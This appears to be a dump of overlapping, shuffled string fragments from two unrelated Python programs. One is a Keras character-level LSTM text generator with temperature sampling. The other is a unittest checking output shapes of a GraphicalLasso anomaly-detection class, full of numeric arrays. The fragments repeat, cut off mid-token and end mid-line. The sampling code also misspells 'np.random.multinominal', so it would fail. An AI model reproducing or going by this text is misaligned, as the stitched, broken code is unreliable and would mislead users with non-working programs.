model.add(layers.LSTM(128, input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars), activation='softmax')) #", "Generating with seed: {generated_text} ---') # Tries a range of", "{generated_text} ---') # Tries a range of different sampling temperatures", "a range of different sampling temperatures for temperature in [0.2,", "at random start_index = random.randint(0, len(text) - maxlen - 1)", "# Single-layer LSTM model for next-character prediction model = keras.models.Sequential()", "epochs=1) # Selects a text seed at random start_index =", "# Function to sample the next character given the model’s", "range of different sampling temperatures for temperature in [0.2, 0.5,", "# Text-generation loop import sys import random # Trains the", "loop import sys import random # Trains the model for", "the next character given the model’s predictions def sample(preds, temperature=1.0):", "# Selects a text seed at random start_index = random.randint(0,", "y, batch_size=128, epochs=1) # Selects a text seed at random", "to sample the next character given the model’s predictions def", "# Samples the next character preds = model.predict(sampled, verbose=0)[0] next_index", "np.log(preds) / temperature exp_preds = np.exp(preds) preds = exp_preds /", "maxlen] print(f'--- Generating with seed: {generated_text} ---') # Tries a", "characters, starting from the seed text for i in range(400):", "- 1) generated_text = text[start_index: start_index + maxlen] print(f'--- Generating", "enumerate(generated_text): sampled[0, t, char_indices[char]] = 1. # Samples the next", "- maxlen - 1) generated_text = text[start_index: start_index + maxlen]", "np.random.multinominal(1, preds, 1) return np.argmax(probas) # Text-generation loop import sys", "from keras import layers # Single-layer LSTM model for next-character", "import random # Trains the model for 60 epochs for", "temperature in [0.2, 0.5, 1.0, 1.2]: print(f'--- Temperature {temperature} ---')", "i in range(400): sampled = np.zeros((1, maxlen, len(chars))) for t,", "print(f'Epoch: {epoch}') model.fit(x, y, batch_size=128, epochs=1) # Selects a text", "model.fit(x, y, batch_size=128, epochs=1) # Selects a text seed at", "/ temperature exp_preds = np.exp(preds) preds = exp_preds / np.sum(exp_preds)", "sample(preds, temperature=1.0): preds = np.asarray(preds).astype('float64') preds = np.log(preds) / temperature", "t, char in enumerate(generated_text): sampled[0, t, char_indices[char]] = 1. #", "epoch in range(1, 60): print(f'Epoch: {epoch}') model.fit(x, y, batch_size=128, epochs=1)", "random start_index = random.randint(0, len(text) - maxlen - 1) generated_text", "# Generates 400 characters, starting from the seed text for", "preds = exp_preds / np.sum(exp_preds) probas = np.random.multinominal(1, preds, 1)", "Model compilation configuration optimizer = keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer) # Function", "model.add(layers.LSTM(128, input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars), activation='softmax')) # Model compilation configuration optimizer", "maxlen, len(chars))) for t, char in enumerate(generated_text): sampled[0, t, char_indices[char]]", "# Tries a range of different sampling temperatures for temperature", "1) return np.argmax(probas) # Text-generation loop import sys import random", "the model’s predictions def sample(preds, temperature=1.0): preds = np.asarray(preds).astype('float64') preds", "keras import layers # Single-layer LSTM model for next-character prediction", "Temperature {temperature} ---') sys.stdout.write(generated_text) # Generates 400 characters, starting from", "next character given the model’s predictions def sample(preds, temperature=1.0): preds", "for t, char in enumerate(generated_text): sampled[0, t, char_indices[char]] = 1.", "= np.exp(preds) preds = exp_preds / np.sum(exp_preds) probas = np.random.multinominal(1,", "generated_text = text[start_index: start_index + maxlen] print(f'--- Generating with seed:", "char in enumerate(generated_text): sampled[0, t, char_indices[char]] = 1. # Samples", "keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer) # Function to sample the next character", "the model for 60 epochs for epoch in range(1, 60):", "= random.randint(0, len(text) - maxlen - 1) generated_text = text[start_index:", "sample(preds, temperature) next_char = chars[next_index] generated_text += next_char generated_text =", "/ np.sum(exp_preds) probas = np.random.multinominal(1, preds, 1) return np.argmax(probas) #", "len(chars))) for t, char in enumerate(generated_text): sampled[0, t, char_indices[char]] =", "in range(1, 60): print(f'Epoch: {epoch}') model.fit(x, y, batch_size=128, epochs=1) #", "# Model compilation configuration optimizer = keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer) #", "Trains the model for 60 epochs for epoch in range(1,", "start_index + maxlen] print(f'--- Generating with seed: {generated_text} ---') #", "exp_preds = np.exp(preds) preds = exp_preds / np.sum(exp_preds) probas =", "model for next-character prediction model = keras.models.Sequential() model.add(layers.LSTM(128, input_shape=(maxlen, len(chars))))", "len(chars)))) model.add(layers.Dense(len(chars), activation='softmax')) # Model compilation configuration optimizer = keras.optimizers.RMSprop(lr=0.01)", "range(1, 60): print(f'Epoch: {epoch}') model.fit(x, y, batch_size=128, epochs=1) # Selects", "given the model’s predictions def sample(preds, temperature=1.0): preds = np.asarray(preds).astype('float64')", "in range(400): sampled = np.zeros((1, maxlen, len(chars))) for t, char", "preds = np.asarray(preds).astype('float64') preds = np.log(preds) / temperature exp_preds =", "input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars), activation='softmax')) # Model compilation configuration optimizer =", "keras.models.Sequential() model.add(layers.LSTM(128, input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars), activation='softmax')) # Model compilation configuration", "starting from the seed text for i in range(400): sampled", "model.add(layers.Dense(len(chars), activation='softmax')) # Model compilation configuration optimizer = keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy',", "temperature) next_char = chars[next_index] generated_text += next_char generated_text = generated_text[1:]", "model.predict(sampled, verbose=0)[0] next_index = sample(preds, temperature) next_char = chars[next_index] generated_text", "with seed: {generated_text} ---') # Tries a range of different", "np.exp(preds) preds = exp_preds / np.sum(exp_preds) probas = np.random.multinominal(1, preds,", "in enumerate(generated_text): sampled[0, t, char_indices[char]] = 1. # Samples the", "optimizer = keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer) # Function to sample the", "# Trains the model for 60 epochs for epoch in", "print(f'--- Temperature {temperature} ---') sys.stdout.write(generated_text) # Generates 400 characters, starting", "sampled = np.zeros((1, maxlen, len(chars))) for t, char in enumerate(generated_text):", "next_char = chars[next_index] generated_text += next_char generated_text = generated_text[1:] sys.stdout.write(next_char)", "LSTM model for next-character prediction model = keras.models.Sequential() model.add(layers.LSTM(128, input_shape=(maxlen,", "for 60 epochs for epoch in range(1, 60): print(f'Epoch: {epoch}')", "next character preds = model.predict(sampled, verbose=0)[0] next_index = sample(preds, temperature)", "---') # Tries a range of different sampling temperatures for", "maxlen - 1) generated_text = text[start_index: start_index + maxlen] print(f'---", "Tries a range of different sampling temperatures for temperature in", "text for i in range(400): sampled = np.zeros((1, maxlen, len(chars)))", "Samples the next character preds = model.predict(sampled, verbose=0)[0] next_index =", "Selects a text seed at random start_index = random.randint(0, len(text)", "np.zeros((1, maxlen, len(chars))) for t, char in enumerate(generated_text): sampled[0, t,", "sys import random # Trains the model for 60 epochs", "batch_size=128, epochs=1) # Selects a text seed at random start_index", "text[start_index: start_index + maxlen] print(f'--- Generating with seed: {generated_text} ---')" ]
[ "return GraphicalLasso def _makeOne(self, *args, **kwargs): return self._getTarget()(*args, **kwargs) @classmethod", "[-0.904446243, -0.287837582, 0.197153592], [-1.106120624, 0.243612535, 1.051237763], [0.371920628, 1.690566027, -0.468645532], [-0.861682655,", "-0.599247488], [-0.503171745, -1.308368748, -1.451411048], [-0.904446243, -0.287837582, 0.197153592], [-1.106120624, 0.243612535, 1.051237763],", "import numpy as np class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test cases.\"\"\" def", "[-0.503171745, -1.308368748, -1.451411048], [-0.904446243, -0.287837582, 0.197153592], [-1.106120624, 0.243612535, 1.051237763], [0.371920628,", "-0.430338406], [-0.583857254, 0.228815073, -1.321443286], [0.963425438, -1.136873938, 0.990406269], [-1.342349795, -0.147133485, 1.286410605],", "\"\"\"Basic test cases.\"\"\" def _getTarget(self): from pyanom.structure_learning import GraphicalLasso return", "-1.136873938, 0.990406269], [-1.342349795, -0.147133485, 1.286410605], [-0.546153552, 0.134343445, -0.380672316], [-2.264867999, 0.227795362,", "0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1) X_error = np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211,", "1.24946146, 0.322341667], [1.057265661, -0.846614104, -0.355396321], [0.810670486, -0.719804484, -0.943762163], [1.169028226, 0.492444331,", "import GraphicalLasso return GraphicalLasso def _makeOne(self, *args, **kwargs): return self._getTarget()(*args,", "-0.052417831, 0.787284547], [-1.059131881, 1.621161051, -1.295306533], [0.499065038, -1.064179225, 1.243325767], [0.452740621, -0.737171777,", "import unittest import numpy as np class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test", "self._makeOne() target.fit(self.X_normal) pred, pmatrix = target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3, )) self.assertEqual(pmatrix.shape,", "[0.017011646, 1.556247275, -0.149119024], [-1.129336215, 0.486811944, 0.012272206], [0.498967152, -0.530065628, -2.14011938], [0.402460108,", "numpy as np class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test cases.\"\"\" def _getTarget(self):", "1.481425898, -0.170147132, -1.527687346, 0.580282631, -3.722489636]).reshape(-1, 1) target = self._makeOne() with", "[0.499065038, -1.064179225, 1.243325767], [0.452740621, -0.737171777, 0.352807563], [0.626897927, -1.100559392, -0.905560876], [1.338835274,", "[-2.264867999, 0.227795362, 1.477762968], [0.070095074, -0.770899782, 2.100831522], [0.425213005, 0.796156033, 1.676164975]]) self.X_error", "io import unittest import numpy as np class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic", "0.509095939], [0.849156845, 0.533674261, 0.069183014], [0.102812565, 8, 1.545239732]]) def test_outlier_analysis_score_shape(self): target", "0.134343445, -0.380672316], [-2.264867999, 0.227795362, 1.477762968], [0.070095074, -0.770899782, 2.100831522], [0.425213005, 0.796156033,", "[-1.125947228, -1.049026454, 0.35980022], [0.653070988, -0.052417831, 0.787284547], [-1.059131881, 1.621161051, -1.295306533], [0.499065038,", "[1.298381426, 0.19445334, 2.267355363], [1.46892843, 1.24946146, 0.322341667], [1.057265661, -0.846614104, -0.355396321], [0.810670486,", "def test_incorrect_feature_size(self): X_normal = np.array([-0.056523959, - 0.881470896, -0.249935965, 0.186624902, -0.30183287,", "1.472544046, -0.846863556], [0.632918214, 1.35895507, -1.217528827], [0.017011646, 1.556247275, -0.149119024], [-1.129336215, 0.486811944,", "0.356336588, 1.595876828], [-0.708547003, -0.572139833, 0.858932219], [-1.125947228, -1.049026454, 0.35980022], [0.653070988, -0.052417831,", "target = self._makeOne() target.fit(self.X_normal) pred, pmatrix = target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3,", "-0.041584595], [-0.847994655, -1.281269721, -0.430338406], [-0.583857254, 0.228815073, -1.321443286], [0.963425438, -1.136873938, 0.990406269],", "[0.070095074, -0.770899782, 2.100831522], [0.425213005, 0.796156033, 1.676164975]]) self.X_error = np.array([[-0.273095586, 0.356336588,", "self.assertEqual(pred.shape, (20, 3)) def test_incorrect_feature_size(self): X_normal = np.array([-0.056523959, - 0.881470896,", "[0.402460108, -0.474465633, -0.041584595], [-0.847994655, -1.281269721, -0.430338406], [-0.583857254, 0.228815073, -1.321443286], [0.963425438,", "pyanom.structure_learning import GraphicalLasso return GraphicalLasso def _makeOne(self, *args, **kwargs): return", "1.595876828], [-0.708547003, -0.572139833, 0.858932219], [-1.125947228, -1.049026454, 0.35980022], [0.653070988, -0.052417831, 0.787284547],", "1.621161051, -1.295306533], [0.499065038, -1.064179225, 1.243325767], [0.452740621, -0.737171777, 0.352807563], [0.626897927, -1.100559392,", "0.737179562, 1.481425898, -0.170147132, -1.527687346, 0.580282631, -3.722489636]).reshape(-1, 1) target = self._makeOne()", "= target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3, )) self.assertEqual(pmatrix.shape, (3, 3)) if __name__", "[0.849156845, 0.533674261, 0.069183014], [0.102812565, 8, 1.545239732]]) def test_outlier_analysis_score_shape(self): target =", "cases.\"\"\" def _getTarget(self): from pyanom.structure_learning import GraphicalLasso return GraphicalLasso def", "-0.468645532], [-0.861682655, 1.472544046, -0.846863556], [0.632918214, 1.35895507, -1.217528827], [0.017011646, 1.556247275, -0.149119024],", "GraphicalLasso def _makeOne(self, *args, **kwargs): return self._getTarget()(*args, **kwargs) @classmethod def", "[1.46892843, 1.24946146, 0.322341667], [1.057265661, -0.846614104, -0.355396321], [0.810670486, -0.719804484, -0.943762163], [1.169028226,", "_makeOne(self, *args, **kwargs): return self._getTarget()(*args, **kwargs) @classmethod def setUpClass(self): self.X_normal", "1.545239732]]) def test_outlier_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred = target.outlier_analysis_score(self.X_error)", "-0.30183287, 2.000815584, 0.710538188, 0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1) X_error = np.array([0.660985506,", "0.197153592], [-1.106120624, 0.243612535, 1.051237763], [0.371920628, 1.690566027, -0.468645532], [-0.861682655, 1.472544046, -0.846863556],", "self._makeOne() with self.assertRaises(ValueError): target.fit(X_normal) def test_anomaly_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal)", "-0.770899782, 2.100831522], [0.425213005, 0.796156033, 1.676164975]]) self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828],", "0.322341667], [1.057265661, -0.846614104, -0.355396321], [0.810670486, -0.719804484, -0.943762163], [1.169028226, 0.492444331, 0.234015505],", "as np class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test cases.\"\"\" def _getTarget(self): from", "-2.14011938], [0.402460108, -0.474465633, -0.041584595], [-0.847994655, -1.281269721, -0.430338406], [-0.583857254, 0.228815073, -1.321443286],", "[-0.847994655, -1.281269721, -0.430338406], [-0.583857254, 0.228815073, -1.321443286], [0.963425438, -1.136873938, 0.990406269], [-1.342349795,", "[0.264928015, 10, 2.544472412], [-0.754827534, -1.031919195, 1.227285333], [-0.774019674, 0.241245625, -0.989132941], [1.298381426,", "[-0.583857254, 0.228815073, -1.321443286], [0.963425438, -1.136873938, 0.990406269], [-1.342349795, -0.147133485, 1.286410605], [-0.546153552,", "1.243325767], [0.452740621, -0.737171777, 0.352807563], [0.626897927, -1.100559392, -0.905560876], [1.338835274, 2.083549348, -1.280796042],", "[-1.106120624, 0.243612535, 1.051237763], [0.371920628, 1.690566027, -0.468645532], [-0.861682655, 1.472544046, -0.846863556], [0.632918214,", "0.099804538, 0.114730483]).reshape(-1, 1) X_error = np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211, 0.737179562,", "= np.array([[0.975586009, -0.745997359, -0.229331244], [-0.460992487, -1.304668238, -0.599247488], [-0.503171745, -1.308368748, -1.451411048],", "[0.626897927, -1.100559392, -0.905560876], [1.338835274, 2.083549348, -1.280796042], [0.264928015, 10, 2.544472412], [-0.754827534,", "test cases.\"\"\" def _getTarget(self): from pyanom.structure_learning import GraphicalLasso return GraphicalLasso", "0.228815073, -1.321443286], [0.963425438, -1.136873938, 0.990406269], [-1.342349795, -0.147133485, 1.286410605], [-0.546153552, 0.134343445,", "*args, **kwargs): return self._getTarget()(*args, **kwargs) @classmethod def setUpClass(self): self.X_normal =", "[1.338835274, 2.083549348, -1.280796042], [0.264928015, 10, 2.544472412], [-0.754827534, -1.031919195, 1.227285333], [-0.774019674,", "0.069183014], [0.102812565, 8, 1.545239732]]) def test_outlier_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal)", "setUpClass(self): self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244], [-0.460992487, -1.304668238, -0.599247488], [-0.503171745,", "-0.287837582, 0.197153592], [-1.106120624, 0.243612535, 1.051237763], [0.371920628, 1.690566027, -0.468645532], [-0.861682655, 1.472544046,", "0.533674261, 0.069183014], [0.102812565, 8, 1.545239732]]) def test_outlier_analysis_score_shape(self): target = self._makeOne()", "target.fit(self.X_normal) pred = target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20, 3)) def test_incorrect_feature_size(self): X_normal", "target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3, )) self.assertEqual(pmatrix.shape, (3, 3)) if __name__ ==", "(3, )) self.assertEqual(pmatrix.shape, (3, 3)) if __name__ == '__main__': unittest.main()", "self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828], [-0.708547003, -0.572139833, 0.858932219], [-1.125947228, -1.049026454,", "-1.064179225, 1.243325767], [0.452740621, -0.737171777, 0.352807563], [0.626897927, -1.100559392, -0.905560876], [1.338835274, 2.083549348,", "[1.169028226, 0.492444331, 0.234015505], [-0.307091024, -1.56195639, 0.509095939], [0.849156845, 0.533674261, 0.069183014], [0.102812565,", "np.array([[-0.273095586, 0.356336588, 1.595876828], [-0.708547003, -0.572139833, 0.858932219], [-1.125947228, -1.049026454, 0.35980022], [0.653070988,", "0.241245625, -0.989132941], [1.298381426, 0.19445334, 2.267355363], [1.46892843, 1.24946146, 0.322341667], [1.057265661, -0.846614104,", "0.114730483]).reshape(-1, 1) X_error = np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211, 0.737179562, 1.481425898,", "def test_outlier_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred = target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape,", "**kwargs): return self._getTarget()(*args, **kwargs) @classmethod def setUpClass(self): self.X_normal = np.array([[0.975586009,", "return self._getTarget()(*args, **kwargs) @classmethod def setUpClass(self): self.X_normal = np.array([[0.975586009, -0.745997359,", "np.array([[0.975586009, -0.745997359, -0.229331244], [-0.460992487, -1.304668238, -0.599247488], [-0.503171745, -1.308368748, -1.451411048], [-0.904446243,", "[-0.460992487, -1.304668238, -0.599247488], [-0.503171745, -1.308368748, -1.451411048], [-0.904446243, -0.287837582, 0.197153592], [-1.106120624,", "0.243612535, 1.051237763], [0.371920628, 1.690566027, -0.468645532], [-0.861682655, 1.472544046, -0.846863556], [0.632918214, 1.35895507,", "1.35895507, -1.217528827], [0.017011646, 1.556247275, -0.149119024], [-1.129336215, 0.486811944, 0.012272206], [0.498967152, -0.530065628,", "0.858932219], [-1.125947228, -1.049026454, 0.35980022], [0.653070988, -0.052417831, 0.787284547], [-1.059131881, 1.621161051, -1.295306533],", "self._getTarget()(*args, **kwargs) @classmethod def setUpClass(self): self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244],", "with self.assertRaises(ValueError): target.fit(X_normal) def test_anomaly_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred,", "@classmethod def setUpClass(self): self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244], [-0.460992487, -1.304668238,", "0.352807563], [0.626897927, -1.100559392, -0.905560876], [1.338835274, 2.083549348, -1.280796042], [0.264928015, 10, 2.544472412],", "-0.380672316], [-2.264867999, 0.227795362, 1.477762968], [0.070095074, -0.770899782, 2.100831522], [0.425213005, 0.796156033, 1.676164975]])", "def _getTarget(self): from pyanom.structure_learning import GraphicalLasso return GraphicalLasso def _makeOne(self,", "= np.array([-0.056523959, - 0.881470896, -0.249935965, 0.186624902, -0.30183287, 2.000815584, 0.710538188, 0.591089702,", "-0.943762163], [1.169028226, 0.492444331, 0.234015505], [-0.307091024, -1.56195639, 0.509095939], [0.849156845, 0.533674261, 0.069183014],", "0.990406269], [-1.342349795, -0.147133485, 1.286410605], [-0.546153552, 0.134343445, -0.380672316], [-2.264867999, 0.227795362, 1.477762968],", "np class TestGraphicalLasso(unittest.TestCase): \"\"\"Basic test cases.\"\"\" def _getTarget(self): from pyanom.structure_learning", "-0.989132941], [1.298381426, 0.19445334, 2.267355363], [1.46892843, 1.24946146, 0.322341667], [1.057265661, -0.846614104, -0.355396321],", "-1.56195639, 0.509095939], [0.849156845, 0.533674261, 0.069183014], [0.102812565, 8, 1.545239732]]) def test_outlier_analysis_score_shape(self):", "3)) def test_incorrect_feature_size(self): X_normal = np.array([-0.056523959, - 0.881470896, -0.249935965, 0.186624902,", "0.012272206], [0.498967152, -0.530065628, -2.14011938], [0.402460108, -0.474465633, -0.041584595], [-0.847994655, -1.281269721, -0.430338406],", "0.19445334, 2.267355363], [1.46892843, 1.24946146, 0.322341667], [1.057265661, -0.846614104, -0.355396321], [0.810670486, -0.719804484,", "0.796156033, 1.676164975]]) self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828], [-0.708547003, -0.572139833, 0.858932219],", "-3.722489636]).reshape(-1, 1) target = self._makeOne() with self.assertRaises(ValueError): target.fit(X_normal) def test_anomaly_analysis_score_shape(self):", "1.477762968], [0.070095074, -0.770899782, 2.100831522], [0.425213005, 0.796156033, 1.676164975]]) self.X_error = np.array([[-0.273095586,", "[-0.754827534, -1.031919195, 1.227285333], [-0.774019674, 0.241245625, -0.989132941], [1.298381426, 0.19445334, 2.267355363], [1.46892843,", "[0.653070988, -0.052417831, 0.787284547], [-1.059131881, 1.621161051, -1.295306533], [0.499065038, -1.064179225, 1.243325767], [0.452740621,", "1.556247275, -0.149119024], [-1.129336215, 0.486811944, 0.012272206], [0.498967152, -0.530065628, -2.14011938], [0.402460108, -0.474465633,", "-1.451411048], [-0.904446243, -0.287837582, 0.197153592], [-1.106120624, 0.243612535, 1.051237763], [0.371920628, 1.690566027, -0.468645532],", "self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244], [-0.460992487, -1.304668238, -0.599247488], [-0.503171745, -1.308368748,", "[0.452740621, -0.737171777, 0.352807563], [0.626897927, -1.100559392, -0.905560876], [1.338835274, 2.083549348, -1.280796042], [0.264928015,", "[-0.708547003, -0.572139833, 0.858932219], [-1.125947228, -1.049026454, 0.35980022], [0.653070988, -0.052417831, 0.787284547], [-1.059131881,", "1.227285333], [-0.774019674, 0.241245625, -0.989132941], [1.298381426, 0.19445334, 2.267355363], [1.46892843, 1.24946146, 0.322341667],", "[0.810670486, -0.719804484, -0.943762163], [1.169028226, 0.492444331, 0.234015505], [-0.307091024, -1.56195639, 0.509095939], [0.849156845,", "self.assertEqual(pred.shape, (3, )) self.assertEqual(pmatrix.shape, (3, 3)) if __name__ == '__main__':", "-1.527687346, 0.580282631, -3.722489636]).reshape(-1, 1) target = self._makeOne() with self.assertRaises(ValueError): target.fit(X_normal)", "0.787284547], [-1.059131881, 1.621161051, -1.295306533], [0.499065038, -1.064179225, 1.243325767], [0.452740621, -0.737171777, 0.352807563],", "-1.281269721, -0.430338406], [-0.583857254, 0.228815073, -1.321443286], [0.963425438, -1.136873938, 0.990406269], [-1.342349795, -0.147133485,", "2.100831522], [0.425213005, 0.796156033, 1.676164975]]) self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828], [-0.708547003,", "1.676164975]]) self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828], [-0.708547003, -0.572139833, 0.858932219], [-1.125947228,", "-0.474465633, -0.041584595], [-0.847994655, -1.281269721, -0.430338406], [-0.583857254, 0.228815073, -1.321443286], [0.963425438, -1.136873938,", "-1.280796042], [0.264928015, 10, 2.544472412], [-0.754827534, -1.031919195, 1.227285333], [-0.774019674, 0.241245625, -0.989132941],", "2.000815584, 0.710538188, 0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1) X_error = np.array([0.660985506, -1.450512173,", "X_error = np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211, 0.737179562, 1.481425898, -0.170147132, -1.527687346,", "= self._makeOne() target.fit(self.X_normal) pred = target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20, 3)) def", "[-1.129336215, 0.486811944, 0.012272206], [0.498967152, -0.530065628, -2.14011938], [0.402460108, -0.474465633, -0.041584595], [-0.847994655,", "target = self._makeOne() target.fit(self.X_normal) pred = target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20, 3))", "2.083549348, -1.280796042], [0.264928015, 10, 2.544472412], [-0.754827534, -1.031919195, 1.227285333], [-0.774019674, 0.241245625,", "[-0.774019674, 0.241245625, -0.989132941], [1.298381426, 0.19445334, 2.267355363], [1.46892843, 1.24946146, 0.322341667], [1.057265661,", "= self._makeOne() target.fit(self.X_normal) pred, pmatrix = target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3, ))", "0.881470896, -0.249935965, 0.186624902, -0.30183287, 2.000815584, 0.710538188, 0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1)", "def test_anomaly_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred, pmatrix = target.anomaly_analysis_score(self.X_error)", "self._makeOne() target.fit(self.X_normal) pred = target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20, 3)) def test_incorrect_feature_size(self):", "from pyanom.structure_learning import GraphicalLasso return GraphicalLasso def _makeOne(self, *args, **kwargs):", "0.486811944, 0.012272206], [0.498967152, -0.530065628, -2.14011938], [0.402460108, -0.474465633, -0.041584595], [-0.847994655, -1.281269721,", "-0.530065628, -2.14011938], [0.402460108, -0.474465633, -0.041584595], [-0.847994655, -1.281269721, -0.430338406], [-0.583857254, 0.228815073,", "-0.737171777, 0.352807563], [0.626897927, -1.100559392, -0.905560876], [1.338835274, 2.083549348, -1.280796042], [0.264928015, 10,", "- 0.881470896, -0.249935965, 0.186624902, -0.30183287, 2.000815584, 0.710538188, 0.591089702, 0.099804538, 0.114730483]).reshape(-1,", "0.580282631, -3.722489636]).reshape(-1, 1) target = self._makeOne() with self.assertRaises(ValueError): target.fit(X_normal) def", "-1.420294211, 0.737179562, 1.481425898, -0.170147132, -1.527687346, 0.580282631, -3.722489636]).reshape(-1, 1) target =", "1) target = self._makeOne() with self.assertRaises(ValueError): target.fit(X_normal) def test_anomaly_analysis_score_shape(self): target", "-1.450512173, -1.27733756, -1.420294211, 0.737179562, 1.481425898, -0.170147132, -1.527687346, 0.580282631, -3.722489636]).reshape(-1, 1)", "pred, pmatrix = target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3, )) self.assertEqual(pmatrix.shape, (3, 3))", "**kwargs) @classmethod def setUpClass(self): self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244], [-0.460992487,", "-1.049026454, 0.35980022], [0.653070988, -0.052417831, 0.787284547], [-1.059131881, 1.621161051, -1.295306533], [0.499065038, -1.064179225,", "-0.719804484, -0.943762163], [1.169028226, 0.492444331, 0.234015505], [-0.307091024, -1.56195639, 0.509095939], [0.849156845, 0.533674261,", "= np.array([[-0.273095586, 0.356336588, 1.595876828], [-0.708547003, -0.572139833, 0.858932219], [-1.125947228, -1.049026454, 0.35980022],", "-0.572139833, 0.858932219], [-1.125947228, -1.049026454, 0.35980022], [0.653070988, -0.052417831, 0.787284547], [-1.059131881, 1.621161051,", "0.227795362, 1.477762968], [0.070095074, -0.770899782, 2.100831522], [0.425213005, 0.796156033, 1.676164975]]) self.X_error =", "[0.371920628, 1.690566027, -0.468645532], [-0.861682655, 1.472544046, -0.846863556], [0.632918214, 1.35895507, -1.217528827], [0.017011646,", "2.267355363], [1.46892843, 1.24946146, 0.322341667], [1.057265661, -0.846614104, -0.355396321], [0.810670486, -0.719804484, -0.943762163],", "X_normal = np.array([-0.056523959, - 0.881470896, -0.249935965, 0.186624902, -0.30183287, 2.000815584, 0.710538188,", "target.fit(X_normal) def test_anomaly_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred, pmatrix =", "GraphicalLasso return GraphicalLasso def _makeOne(self, *args, **kwargs): return self._getTarget()(*args, **kwargs)", "target.fit(self.X_normal) pred, pmatrix = target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape, (3, )) self.assertEqual(pmatrix.shape, (3,", "np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211, 0.737179562, 1.481425898, -0.170147132, -1.527687346, 0.580282631, -3.722489636]).reshape(-1,", "[-0.546153552, 0.134343445, -0.380672316], [-2.264867999, 0.227795362, 1.477762968], [0.070095074, -0.770899782, 2.100831522], [0.425213005,", "[1.057265661, -0.846614104, -0.355396321], [0.810670486, -0.719804484, -0.943762163], [1.169028226, 0.492444331, 0.234015505], [-0.307091024,", "test_incorrect_feature_size(self): X_normal = np.array([-0.056523959, - 0.881470896, -0.249935965, 0.186624902, -0.30183287, 2.000815584,", "1.051237763], [0.371920628, 1.690566027, -0.468645532], [-0.861682655, 1.472544046, -0.846863556], [0.632918214, 1.35895507, -1.217528827],", "test_anomaly_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred, pmatrix = target.anomaly_analysis_score(self.X_error) self.assertEqual(pred.shape,", "import io import unittest import numpy as np class TestGraphicalLasso(unittest.TestCase):", "[0.102812565, 8, 1.545239732]]) def test_outlier_analysis_score_shape(self): target = self._makeOne() target.fit(self.X_normal) pred", "-0.355396321], [0.810670486, -0.719804484, -0.943762163], [1.169028226, 0.492444331, 0.234015505], [-0.307091024, -1.56195639, 0.509095939],", "_getTarget(self): from pyanom.structure_learning import GraphicalLasso return GraphicalLasso def _makeOne(self, *args,", "-0.745997359, -0.229331244], [-0.460992487, -1.304668238, -0.599247488], [-0.503171745, -1.308368748, -1.451411048], [-0.904446243, -0.287837582,", "-1.100559392, -0.905560876], [1.338835274, 2.083549348, -1.280796042], [0.264928015, 10, 2.544472412], [-0.754827534, -1.031919195,", "[0.963425438, -1.136873938, 0.990406269], [-1.342349795, -0.147133485, 1.286410605], [-0.546153552, 0.134343445, -0.380672316], [-2.264867999,", "-0.905560876], [1.338835274, 2.083549348, -1.280796042], [0.264928015, 10, 2.544472412], [-0.754827534, -1.031919195, 1.227285333],", "2.544472412], [-0.754827534, -1.031919195, 1.227285333], [-0.774019674, 0.241245625, -0.989132941], [1.298381426, 0.19445334, 2.267355363],", "= target.outlier_analysis_score(self.X_error) self.assertEqual(pred.shape, (20, 3)) def test_incorrect_feature_size(self): X_normal = np.array([-0.056523959,", "= np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211, 0.737179562, 1.481425898, -0.170147132, -1.527687346, 0.580282631,", "pred = 